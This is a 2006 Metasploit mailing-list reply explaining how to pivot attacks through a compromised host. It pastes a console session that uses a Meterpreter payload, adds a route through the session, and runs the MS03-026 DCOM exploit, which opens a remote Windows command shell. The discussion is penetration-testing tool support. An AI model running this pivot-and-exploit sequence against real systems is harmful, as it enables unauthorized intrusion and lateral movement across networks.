[framework] staging attack proxy
Chris Byrd
cbyrd01 at gmail.com
Fri Nov 10 10:03:24 CST 2006
What you are looking for is the meterpreter payload. Once a system
has meterpreter on it, you should be able to route future exploits
through it using the route command. Here's a sample previously posted
by mmiller:

msf exploit(aggressive) > exploit -z
[*] Started reverse handler
[*] Sending 239 byte payload...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.142.43.3:5555 -> 10.142.43.2:3008)
[*] Session 1 created in the background.
msf exploit(aggressive) > route add 192.168.37.0 255.255.255.0 1
msf exploit(aggressive) > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (10.142.43.3:5555 -> 10.142.43.2:3011)
[*] The DCERPC service did not reply to our request
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>

I've had problems getting this to work myself, but I haven't tried it
with the more recent versions. If you try it out, please let me know
(or post on list) as to your results.
Thanks!
Chris
On 11/10/06, Valter Santos <vsantola at gmail.com> wrote:
> Folks,
>
> is there any support for staging attack proxies on Metasploit (v2.7 or
> v3.0)? Searching the docs, I don't see anything.
>
> What I mean by this is whether it is possible to upload a
> "metasploit agent" to a compromised system and proxy attacks through it
> (much along the lines of level1 agents on Core Impact). I think I read
> something about this for Metasploit, but cannot find any info.
>
> cheers,
> /valter
>
> --
> o Valter Santos
> o Security Analyst
> o INFOCON Tactical Overview: http://infocon.sectoid.com
> o PGP: 0xE2A4B206
> o ..
> o Attack is the secret of defense; defense is the planning of an attack.
> o Sun Tzu, Art of War
>